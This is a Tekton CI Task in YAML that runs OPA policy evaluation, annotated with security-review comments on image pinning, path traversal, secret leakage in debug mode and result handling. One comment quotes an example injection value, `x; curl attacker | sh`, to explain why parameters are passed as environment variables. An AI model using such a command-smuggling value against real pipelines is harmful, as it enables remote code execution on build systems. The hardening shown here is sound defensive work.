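---
apiVersion: tekton.dev/v1beta1
kind: Task
metadata:
  name: da-rego-analysis
spec:
  # Runs `opa eval` over the Rego policies in <policy-dir>, using the JSON
  # schemas in <schema-dir>, and writes the pretty-printed output to
  # da-rego-check-comment.md in the shared `artifacts` workspace. The
  # `status` result records whether the evaluation ran without error.
  params:
    - name: repository
      description: the git repo
    - name: policy-dir
      description: the directory where the rego policy files are located
      default: policydir
    - name: schema-dir
      description: the directory where the json schema files are located
      default: schemadir
    - name: directory-name
      description: directory name where the repository is cloned
    - name: pipeline-debug
      description: toggles debug mode for the pipeline
      default: "0"
  results:
    - name: status
      description: status of deployment analyzer task, possible value are- success|failure
    # NOTE(review): `evidence-store` and `rego-check-comment` are declared but
    # the step below never writes to their result paths; depending on the
    # Tekton version a declared-but-unwritten result may leave the TaskRun
    # without that result or fail it — confirm against the target cluster.
    - name: evidence-store
      description: filepath to store deployment analyzer task evidence
    - name: rego-check-comment
      description: md file with detailed results of compliance check
  stepTemplate:
    env:
      - name: PIPELINE_RUN_ID
        valueFrom:
          fieldRef:
            fieldPath: metadata.annotations['devops.cloud.ibm.com/tekton-pipeline']
      - name: PIPELINE_DEBUG
        value: $(params.pipeline-debug)
  steps:
    - name: rego-analysis
      # NOTE(review): `1.1.0` is a mutable tag and `imagePullPolicy: Always`
      # re-pulls it on every run, so whatever the registry serves under that
      # tag is what executes. Pin by digest
      # (`icr.io/gitsecure/gitsecure-rego@sha256:<digest>`) once the expected
      # digest is known.
      image: icr.io/gitsecure/gitsecure-rego:1.1.0
      imagePullPolicy: Always
      env:
        - name: REPOSITORY
          value: $(params.repository)
        # The path parameters are passed as environment variables instead of
        # being substituted into the script text: Tekton expands $(params.*)
        # before /bin/sh parses the script, so a value such as
        # `x; curl attacker | sh` would otherwise run as shell code. As env
        # vars they are plain data and are always expanded quoted below.
        - name: DIRECTORY_NAME
          value: $(params.directory-name)
        - name: POLICY_DIR
          value: $(params.policy-dir)
        - name: SCHEMA_DIR
          value: $(params.schema-dir)
      workingDir: "/artifacts"
      command: ["/bin/sh", "-c"]
      args:
        - |
          #!/bin/sh
          if [ "$PIPELINE_DEBUG" = "1" ]; then
            pwd
            ls /artifacts/
            # WARNING: `env` (here and again in the EXIT trap) dumps every
            # environment variable of this step — including any secret that
            # was injected as an env var — into the pipeline log. Leave
            # debug at its default of "0" in shared pipelines.
            env
            trap env EXIT
            set -x +e
          fi
          # The three path parameters are used as path components under the
          # shared /artifacts workspace; refuse absolute paths and `..` so a
          # caller cannot point the evaluation outside the cloned repository.
          for p in "$DIRECTORY_NAME" "$POLICY_DIR" "$SCHEMA_DIR"; do
            case "$p" in
              /*|..|../*|*/..|*/../*)
                echo "refusing path component '$p'" >&2
                printf '%s' "failure" > "$(results.status.path)"
                exit 1
                ;;
            esac
          done
          POLICY_DIR_PATH="/artifacts/$DIRECTORY_NAME/$POLICY_DIR"
          SCHEMA_DIR_PATH="/artifacts/$DIRECTORY_NAME/$SCHEMA_DIR"
          result="failure"
          echo "Running OPA eval with schema"
          # `opa eval` exits non-zero only when evaluation itself fails (bad
          # Rego, schema error, unreadable directory); it exits 0 regardless
          # of what the policies decide. `status` therefore means "the
          # evaluation ran", not "the policies passed". If a policy verdict
          # should drive the status, query a specific rule with
          # `--fail` / `--fail-defined` instead of the whole `data` document.
          if opa eval data -d "$POLICY_DIR_PATH" -s "$SCHEMA_DIR_PATH" --format pretty > da-rego-check-comment.md; then
            result="success"
          fi
          if [ "$PIPELINE_DEBUG" = "1" ]; then
            echo "$result"
            whoami
            ls -l /artifacts/
          fi
          # Hand the report path to the next step through the shared /steps volume.
          echo "COMMENT_FP=./da-rego-check-comment.md" >> /steps/next-step-env.properties
          # printf rather than `echo -n`: `-n` is not portable across /bin/sh
          # implementations and a literal "-n" in the result file would break
          # consumers comparing against success|failure.
          printf '%s' "$result" > "$(results.status.path)"
      volumeMounts:
        - mountPath: /steps
          name: steps-volume
  workspaces:
    - name: artifacts
      mountPath: /artifacts
  volumes:
    # Scratch volume used to pass next-step-env.properties between steps.
    # (An unused `docker-socket` emptyDir that was declared here but never
    # mounted has been dropped; nothing in this Task talks to a Docker daemon.)
    - name: steps-volume
      emptyDir: {}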